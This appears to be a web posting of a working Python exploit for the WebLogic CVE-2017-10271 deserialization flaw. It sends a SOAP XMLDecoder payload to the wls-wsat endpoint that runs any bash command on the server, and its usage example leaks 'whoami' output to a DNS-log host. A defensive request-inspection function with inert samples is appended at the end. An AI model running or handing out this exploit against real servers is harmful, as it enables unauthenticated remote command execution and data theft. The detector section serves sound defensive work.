WebLogic (CVE-2017-10271) Exploit

  • 2017-12-27

Author: 莫须有
Command format: python3 CVE-2017-10271.py url command
e.g.: python3 CVE-2017-10271.py http://test.cve "ping \`whoami\`.dnslog.cve"

# -*- coding: UTF-8 -*-

'''
Created on 2017-12-23

@author: 莫须有

CVE-2017-10271 EXP

'''

import requests,sys

headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
    'Content-Type':'text/xml'
}

console = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Header>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <java version="1.8.0_131" class="java.beans.XMLDecoder">
 <void class="java.lang.ProcessBuilder">
 <array class="java.lang.String" length="3">
 <void index="0">
 <string>/bin/bash</string>
 </void>
 <void index="1">
 <string>-c</string>
 </void>
 <void index="2">
 <string>%s</string>
 </void>
 </array>
 <void method="start"/></void>
 </java>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body/>
</soapenv:Envelope>'''

help = '''
CVE-2017-10271.py url command
eg:CVE-2017-10271.py http://test.cve "ping \`whoami\`.dnslog.cve"'''

if(len(sys.argv)<3):
    print(help)
    exit()

url = sys.argv[1] + '/wls-wsat/CoordinatorPortType?wsdl'
command = sys.argv[2]

print(command)
try:
    req = requests.post(url, headers = headers, timeout=5, data = console % command)
    if('<faultcode>S:Server</faultcode><faultstring>0</faultstring>' in req.text):
        print('Success!')
    else:
        print('Fail!')
except:
    print('Error!')
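
A defender-side check for the request shape this script sends, added here as an example (not the author's code): it flags POSTs under /wls-wsat/ whose SOAP WorkContext header carries an XMLDecoder document. The function name, the set of flagged element names, the finding strings and both sample bodies are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Namespace and path taken from the request built by the script above.
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
WLS_WSAT_PREFIX = "/wls-wsat/"
# Assumed set of XMLDecoder elements that create objects or call methods.
ACTIVE_TAGS = {"object", "new", "method", "void"}

def inspect_request(method, path, body):
    """Return findings for one HTTP request; an empty list means no match.

    Hypothetical helper. Uses the stdlib parser to stay self-contained; on
    live traffic a hardened parser (for example defusedxml) is safer.
    """
    if method.upper() != "POST" or not path.lower().startswith(WLS_WSAT_PREFIX):
        return []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["unparseable XML posted to wls-wsat"]
    findings = []
    for ctx in root.iter("{%s}WorkContext" % WORKAREA_NS):
        for el in ctx.iter():
            tag = el.tag.rsplit("}", 1)[-1]  # drop any namespace part
            if tag == "java":
                findings.append("XMLDecoder <java> document inside WorkContext")
            elif tag in ACTIVE_TAGS and (el.get("class") or el.get("method")):
                findings.append("%s class=%s method=%s"
                                % (tag, el.get("class"), el.get("method")))
    return findings

# Constructed, inert samples: the first only mimics the header structure.
SAMPLE_SUSPICIOUS = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Header>
  <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
   <java class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder"><void method="start"/></void>
   </java>
  </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body/>
</soapenv:Envelope>"""
SAMPLE_BENIGN = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Header/><soapenv:Body/>
</soapenv:Envelope>"""

if __name__ == "__main__":
    for line in inspect_request("POST", "/wls-wsat/CoordinatorPortType?wsdl", SAMPLE_SUSPICIOUS):
        print(line)
```

The same function can be applied to request bodies captured by a reverse proxy or WAF log; any finding on a /wls-wsat/ path warrants a look at the server's patch level and process activity.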